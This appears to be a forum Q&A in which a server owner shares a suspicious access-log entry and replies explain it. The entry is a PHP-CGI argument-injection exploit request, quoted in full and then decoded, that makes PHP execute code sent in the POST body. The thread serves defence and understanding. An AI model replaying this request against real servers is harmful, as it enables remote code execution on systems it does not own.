So I'm hosting a web server since yesterday and I found this in my access log:
POST /cgi-bin/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin%2Esimulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi%2Eforce_redirect%3D0+-d+cgi%2Eredirect_status_env%3D0+-n
Now I don't know what this does, but to me it seems a bit sketchy.
It looks like someone is trying to put the safe-mode off and trying to push and execute his PHP file on your server.
P.S. This has nothing to do with PHP code but about your server security and you should look the used terms/commands up on Google to find out more.
This is an HTTP request to exploit a vulnerability discovered by Kingcope, where /cgi-bin/php is directly mapped onto the PHP executable, and the query string is used as arguments:
php -d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n
The -d arguments are compatible to INI entries and basically make PHP read and execute PHP code from the POST body (i. e., auto_prepend_file=php://input).
